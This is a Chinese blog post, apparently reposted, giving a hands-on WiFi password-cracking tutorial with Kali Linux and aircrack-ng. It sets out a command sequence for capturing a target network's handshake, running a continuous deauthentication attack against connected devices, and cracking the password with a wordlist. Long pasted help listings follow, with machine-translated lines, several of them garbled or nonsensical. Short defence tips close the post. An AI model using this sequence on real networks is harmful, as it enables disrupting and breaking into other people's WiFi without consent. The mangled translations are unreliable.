kali2022.2无线网络WiFi破解详解
前言
無線網(wǎng)絡(luò)WiFi破解,利用自己家庭無線網(wǎng)絡(luò)作為實驗環(huán)境,請勿用于非法用途。
一、無線網(wǎng)絡(luò)WiFi破解模塊?
airmon-ng #網(wǎng)卡模式切換
airodump-ng #網(wǎng)絡(luò)監(jiān)聽模式(抓取無線網(wǎng)絡(luò)數(shù)據(jù)包)
aireplay-ng #網(wǎng)絡(luò)設(shè)備攻擊
aircrack-ng #破解無線密碼
二、使用步驟詳解
airmon-ng start wlan0 #開啟無線網(wǎng)卡監(jiān)聽模式
airodump-ng wlan0mon #掃描型號區(qū)域內(nèi)WiFi信號
airodump-ng -c 6 --bssid 無線網(wǎng)絡(luò)mac地址 -w 抓取文件保存路徑 wlan0mon #抓取目標(biāo)無線網(wǎng)絡(luò)數(shù)據(jù)包
aireplay-ng -0 0 -a 本地?zé)o線網(wǎng)絡(luò)mac地址 -c 目標(biāo)無線網(wǎng)絡(luò)mac地址 wlan0mon #斷網(wǎng)攻擊目標(biāo)無線網(wǎng)絡(luò)設(shè)備
airmon-ng stop wlan0mon #關(guān)閉無線網(wǎng)卡監(jiān)聽模式
aircrack-ng -w 密碼字典文件 抓包文件(.cap文件) #從密碼字典文件破解抓取目標(biāo)無線網(wǎng)絡(luò)數(shù)據(jù)包
aircrack-ng命令用法
aircrack-ng
usage: aircrack-ng [options] <input file(s)>
用法:aircrack ng[選項]<輸入文件>
Common options:
常見選項:
-a : force attack mode (1/WEP, 2/WPA-PSK)
-a:force攻擊模式(1/WEP,2/WPA-PSK)
-e : target selection: network identifier
-目標(biāo)選擇:網(wǎng)絡(luò)標(biāo)識符
-b : target selection: access point’s MAC
-目標(biāo)選擇:接入點的MAC
-p : # of CPU to use (default: all CPUs)
-要使用的CPU的#(默認(rèn)值:所有CPU)
-q : enable quiet mode (no status output)
-q:啟用安靜模式(無狀態(tài)輸出)
-C : merge the given APs to a virtual one
-C:將給定AP合并到虛擬AP
-l : write key to file. Overwrites file.
-l:將密鑰寫入文件。覆蓋文件。
Static WEP cracking options:
靜態(tài)WEP開裂選項:
-c : search alpha-numeric characters only
-c:僅搜索字母數(shù)字字符
-t : search binary coded decimal chr only
-t:僅搜索二進(jìn)制編碼的十進(jìn)制chr
-h : search the numeric key for Fritz!BOX
-h:在數(shù)字鍵中搜索Fritz!盒子
-d : use masking of the key (A1:XX:CF:YY)
-d:使用鍵的掩碼(A1:XX:CF:YY)
-m : MAC address to filter usable packets
-m:MAC地址,用于過濾可用數(shù)據(jù)包
-n : WEP key length : 64/128/152/256/512
-n:WEP密鑰長度:64/128/152/256/512
-i : WEP key index (1 to 4), default: any
-i:WEP鍵索引(1到4),默認(rèn)值:任意
-f : bruteforce fudge factor, default: 2
-f:bruteforce-fudge因子,默認(rèn)值:2
-k : disable one attack method (1 to 17)
-k:禁用一種攻擊方法(1到17)
-x or -x0 : disable bruteforce for last keybytes
-x或-x0:對最后一個密鑰字節(jié)禁用暴力
-x1 : last keybyte bruteforcing (default)
-x1:last keybyte bruteforcing(默認(rèn))
-x2 : enable last 2 keybytes bruteforcing
-x2:啟用最后2個密鑰字節(jié)暴力破解
-y : experimental single bruteforce mode
-y:實驗單蠻力模式
-K : use only old KoreK attacks (pre-PTW)
-K:僅使用舊KoreK攻擊(PTW之前)
-s : show the key in ASCII while cracking
-s:在破解時以ASCII顯示密鑰
-M : specify maximum number of IVs to use
-M:指定要使用的最大IVs數(shù)
-D : WEP decloak, skips broken keystreams
-D:WEP decloak,跳過斷開的密鑰流
-P : PTW debug: 1: disable Klein, 2: PTW
-P:PTW調(diào)試:1:禁用Klein,2:PTW
-1 : run only 1 try to crack key with PTW
-1:僅運行1次,嘗試使用PTW破解鑰匙
-V : run in visual inspection mode
-V:在目視檢查模式下運行
WEP and WPA-PSK cracking options:
WEP和WPA-PSK開裂選項:
-w : path to wordlist(s) filename(s)
-w:文字列表文件名的路徑
-N : path to new session filename
-N:新會話文件名的路徑
-R : path to existing session filename
-R:現(xiàn)有會話文件名的路徑
WPA-PSK options:
WPA-PSK選項:
-E : create EWSA Project file v3
-E<文件>:創(chuàng)建EWSA項目文件v3
-I : PMKID string (hashcat -m 16800)
-I:PMKID字符串(hashcat-m 16800)
-j : create Hashcat v3.6+ file (HCCAPX)
-j:create Hashcat v3.6+文件(HCCAPX)
-J : create Hashcat file (HCCAP)
-J:創(chuàng)建Hashcat文件(HCCAP)
-S : WPA cracking speed test
-S:WPA開裂速度試驗
-Z : WPA cracking speed test length of
-Z:WPA開裂速度試驗長度
execution.
處決
-r : path to airolib-ng database
-r:airolib ng數(shù)據(jù)庫的路徑
(Cannot be used with -w)
(不能與-w一起使用)
SIMD selection:
SIMD選擇:
–simd-list : Show a list of the available
–simd列表:顯示可用的
SIMD architectures, for this
SIMD架構(gòu),為此
machine.
機(jī)器
–simd= : Use specific SIMD architecture.
–simd=<選項>:使用特定的simd體系結(jié)構(gòu)。
aireplay-ng命令用法
└─# aireplay-ng --help
└─# aireplay ng–幫助
Aireplay-ng 1.6 - ? 2006-2020 Thomas d’Otreppe
Aireplay ng 1.6-(C)2006-2020托馬斯·多特普
https://www.aircrack-ng.org
https://www.aircrack-ng.org
usage: aireplay-ng
用法:aireplay ng
Filter options:
過濾器選項:
-b bssid : MAC address, Access Point
-b bssid:MAC地址,接入點
-d dmac : MAC address, Destination
-d dmac:MAC地址,目的地
-s smac : MAC address, Source
-s smac:MAC地址,源
-m len : minimum packet length
-m len:最小數(shù)據(jù)包長度
-n len : maximum packet length
-n len:最大數(shù)據(jù)包長度
-u type : frame control, type field
-u類型:幀控制,類型字段
-v subt : frame control, subtype field
-v subt:幀控件,子類型字段
-t tods : frame control, To DS bit
-t tods:幀控制,到DS位
-f fromds : frame control, From DS bit
-f fromds:幀控制,來自DS位
-w iswep : frame control, WEP bit
-w iswep:幀控制,WEP位
-D : disable AP detection
-D:禁用AP檢測
Replay options:
重播選項:
-x nbpps : number of packets per second
-x nbpps:每秒的數(shù)據(jù)包數(shù)
-p fctrl : set frame control word (hex)
-p fctrl:設(shè)置幀控制字(十六進(jìn)制)
-a bssid : set Access Point MAC address
-bssid:設(shè)置接入點MAC地址
-c dmac : set Destination MAC address
-c dmac:設(shè)置目標(biāo)MAC地址
-h smac : set Source MAC address
-h smac:設(shè)置源MAC地址
-g value : change ring buffer size (default: 8)
-g值:更改環(huán)形緩沖區(qū)大小(默認(rèn)值:8)
-F : choose first matching packet
-F:選擇第一個匹配的數(shù)據(jù)包
Fakeauth attack options:
Fakeauth攻擊選項:
-e essid : set target AP SSID
-e essid:設(shè)置目標(biāo)AP SSID
-o npckts : number of packets per burst (0=auto, default: 1)
-o npckts:每個突發(fā)的數(shù)據(jù)包數(shù)(0=自動,默認(rèn)值:1)
-q sec : seconds between keep-alives
-q秒:兩次生存之間的秒數(shù)
-Q : send reassociation requests
-Q:發(fā)送重新關(guān)聯(lián)請求
-y prga : keystream for shared key auth
-y prga:共享密鑰驗證的密鑰流
-T n : exit after retry fake auth request n time
-T n:重試假身份驗證請求n次后退出
Arp Replay attack options:
Arp重播攻擊選項:
-j : inject FromDS packets
-j:注入FromDS數(shù)據(jù)包
Fragmentation attack options:
碎片攻擊選項:
-k IP : set destination IP in fragments
-k IP:在片段中設(shè)置目標(biāo)IP
-l IP : set source IP in fragments
-l IP:在片段中設(shè)置源IP
Test attack options:
測試攻擊選項:
-B : activates the bitrate test
-B:激活比特率測試
Source options:
源選項:
-i iface : capture packets from this interface
-i iface:從該接口捕獲數(shù)據(jù)包
-r file : extract packets from this pcap file
-r文件:從此pcap文件中提取數(shù)據(jù)包
Miscellaneous options:
其他選項:
-R : disable /dev/rtc usage
-R:禁用/開發(fā)/rtc使用
–ignore-negative-one : if the interface’s channel can’t be determined,
–忽略消極因素:如果無法確定接口的通道,
ignore the mismatch, needed for unpatched cfg80211
忽略未匹配的cfg80211所需的不匹配
–deauth-rc rc : Deauthentication reason code [0-254] (Default: 7)
–取消身份驗證rc:取消身份驗證原因代碼[0-254](默認(rèn)值:7)
Attack modes (numbers can still be used):
攻擊模式(仍然可以使用數(shù)字):
–deauth count : deauthenticate 1 or all stations (-0)
–取消身份驗證計數(shù):取消身份驗證1或所有站點(-0)
–fakeauth delay : fake authentication with AP (-1)
–fakeauth延遲:與AP的假身份驗證(-1)
–interactive : interactive frame selection (-2)
–交互式:交互式幀選擇(-2)
–arpreplay : standard ARP-request replay (-3)
–ARP重播:標(biāo)準(zhǔn)ARP請求重播(-3)
–chopchop : decrypt/chopchop WEP packet (-4)
–chopchop:解密/chopchop WEP數(shù)據(jù)包(-4)
–fragment : generates valid keystream (-5)
–片段:生成有效的密鑰流(-5)
–caffe-latte : query a client for new IVs (-6)
–咖啡拿鐵:向客戶查詢新的IVs(-6)
–cfrag : fragments against a client (-7)
–cfrag:針對客戶端的碎片(-7)
–migmode : attacks WPA migration mode (-8)
–migmode:攻擊WPA遷移模式(-8)
–test : tests injection and quality (-9)
–測試:測試注射和質(zhì)量(-9)
–help : Displays this usage screen
–幫助:顯示此用法屏幕
airodump-ng命令用法
└─# airodump-ng --help
94492;9472;\ 35;;airodump ng—幫助130 10799999999;
Airodump-ng 1.6 - ? 2006-2020 Thomas d’Otreppe
Airodump ng 1.6(C)2006-20 Thomas d’Otpe
https://www.aircrack-ng.org
https://www.aircrack-ng.org
usage: airodump-ng [,,…]
airodump ng選項“…_接口”,
Options:
選項:
–ivs : Save only captured IVs
僅保存捕獲的IVs
–gpsd : Use GPSd
–gpsd:使用gpsd。
–write : Dump file prefix
-write”:轉(zhuǎn)儲前綴文件。
-w : same as --write
-w、 與相同–
–beacons : Record all beacons in dump file
在文件轉(zhuǎn)儲中記錄所有信標(biāo)
–update : Display update delay in seconds
…更新{y:bi}顯示延遲(秒)
–showack : Prints ack/cts/rts statistics
–showack:打印ack/rts統(tǒng)計信息
-h : Hides known stations for --showack
隱藏…showack的已知電臺
-f : Time in ms between hopping channels
跳頻通道之間的時間(毫秒)。
–berlin : Time before removing the AP/client
…柏林{u秒}時間,然后刪除AP/客戶端
from the screen when no more packets
當(dāng)沒有更多數(shù)據(jù)包時從屏幕上
are received (Default: 120 seconds)
已接收(默認(rèn)值:120秒)
-r : Read packets from that file
從該文件讀取數(shù)據(jù)包
-T : While reading packets from a file,
從文件中讀取數(shù)據(jù)包時,
simulate the arrival rate of them
模擬它們的到達(dá)率
as if they were “l(fā)ive”.
就好像他們是“活著的”
-x : Active Scanning Simulation
-x’…\u毫秒:主動掃描模擬
–manufacturer : Display manufacturer from IEEE OUI list
IEEE OUI列表中的顯示器制造商
–uptime : Display AP Uptime from Beacon Timestamp
從信標(biāo)時間戳顯示AP正常運行時間
–wps : Display WPS information (if any)
顯示W(wǎng)PS信息(如有)
–output-format
…輸出格式
: Output format. Possible values:
輸出格式。對不起。可能值:
pcap, ivs, csv, gps, kismet, netxml, logcsv
pcap、ivs、csv、gps、kismet、netxml、logcsv。
–ignore-negative-one : Removes the message that says
-忽略負(fù)面消息:刪除以下消息:
fixed channel : -1
固定通道{y:bi}接口:-1
–write-interval
–寫入間隔
: Output file(s) write interval in seconds
輸出文件間隔(秒)
–background : Override background detection.
…背景{y:bi}覆蓋背景檢測。
-n : Minimum AP packets recv’d before
“之前接收的最小AP數(shù)據(jù)包數(shù)”
for displaying it
用于顯示它。
Filter options:
過濾器選項:
–encrypt : Filter APs by cipher suite
…encrypt_suite('通過密碼過濾AP)
–netmask : Filter APs by mask
過濾器APmask
–bssid : Filter APs by BSSID
–bssid’-過濾器bssid:按bssid過濾AP
–essid : Filter APs by ESSID
–essid{essid通過ESS過濾AP
–essid-regex : Filter APs by ESSID using a regular
–essid正則表達(dá)式{u regex}使用正則ID按正則ID過濾AP
expression
表示
-a : Filter unassociated clients
篩選未關(guān)聯(lián)的客戶端。
By default, airodump-ng hops on 2.4GHz channels.
默認(rèn)情況下,airodump ng在2.4GHz信道上跳躍。
You can make it capture on other/specific channel(s) by using:
您可以使用以下方法在其他/特定通道上進(jìn)行捕獲:
–ht20 : Set channel to HT20 (802.11n)
將通道設(shè)置為HT20(802.11n)
–ht40- : Set channel to HT40- (802.11n)
將通道設(shè)置為HT40-(802.11n)
–ht40+ : Set channel to HT40+ (802.11n)
…h(huán)t40+將通道設(shè)置為ht40+(802.11n)
–channel : Capture on specific channels
…通道{y:bi}在特定通道上捕獲。
–band : Band on which airodump-ng should hop
–波段~~ airodump應(yīng)該跳的abg波段
-C : Uses these frequencies in MHz to hop
-C{y:bi}使用這些頻率(以MHz為單位)進(jìn)行跳躍
–cswitch : Set channel switching method
–cswitch:設(shè)置通道切換方法
0 : FIFO (default)
0:FIFO(默認(rèn))
1 : Round Robin
循環(huán)賽
2 : Hop on last
跳到最后一個
-s : same as --cswitch
-與-C開關(guān)相同。
–help : Displays this usage screen
顯示此使用屏幕
airmon-ng命令用法(網(wǎng)卡監(jiān)聽模式)
usage: airmon-ng <start|stop|check> [channel or frequency]
用法:airmon ng<start | stop | check>[通道或頻率]
總結(jié)
防御辦法
1.防止這種攻擊最簡單的方法是設(shè)置復(fù)雜長的密碼(大寫字母+小寫字母+數(shù)字+特殊符號):
2.不要使用WEP或WEP2加密方式,非常容易被破解
3.關(guān)閉無線路由器都有WPS功能。
總結(jié)
以上是生活随笔為你收集整理的kali2022.2无线网络WiFi破解详解的全部內(nèi)容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: html日历修改,HTML精美日历插件
- 下一篇: flash芯片测试